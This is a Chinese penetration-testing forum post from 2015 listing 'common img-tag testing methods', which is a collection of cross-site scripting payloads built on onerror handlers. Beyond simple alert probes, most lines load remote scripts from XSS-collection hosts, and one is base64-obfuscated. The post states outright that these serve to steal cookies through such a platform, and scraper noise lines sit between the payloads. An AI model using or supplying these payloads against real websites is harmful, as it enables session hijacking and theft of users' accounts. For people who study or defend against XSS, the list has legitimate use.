中国网络渗透测试联盟
标题:
img标签的常用几种测试手段
[打印本页]
作者:
admin
时间:
2015-10-18 14:33
标题:
img标签的常用几种测试手段
<img src='non-exist.jpg'onerror="alert('xss')">
* _/ P W+ B( e; }4 ~5 [
<img src=# onerror=alert(123)>
4 p# N% D, P' o" J2 u
<img src=# onerror=alert(document.cookie)>
% {+ t0 K) @& r# v9 E0 Y
下面是利用平台钓cookie的
& J) J! W" x! d, t2 m0 h
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
' b" H6 g; E3 W
9 c* E- U' x9 ]- b% }+ e
$ @! h- _* f& B- F G4 X" @" c
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
# v' N7 S+ [# `: \$ f
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
4 I4 u8 ^, j: w& ^) C8 n& t4 @6 ]
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
6 O' X& u& F* ?6 [
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
5 ]) ?1 G7 c( V+ X/ i0 p
<img src="#">
: B2 B0 A7 @7 V8 o5 m
<img src="#">
6 ]* V3 p9 u; f/ b) D
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
- y" h4 v' v& q3 C: {
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
; B, j! [# f) N# U3 N' a( q: W
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
# q# Q4 K8 Z8 w2 b9 {
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
1 V2 @% d$ h2 {( i9 J" y
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
( o! w$ O; I1 c" S+ v1 ]) R
<img src=x width="0" height="0"></img>
: k' T& }6 G, C: w( `
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
* z) l/ h' [) i' K( Q+ ~7 J$ C
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
: R" j0 u9 W# ^- T
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2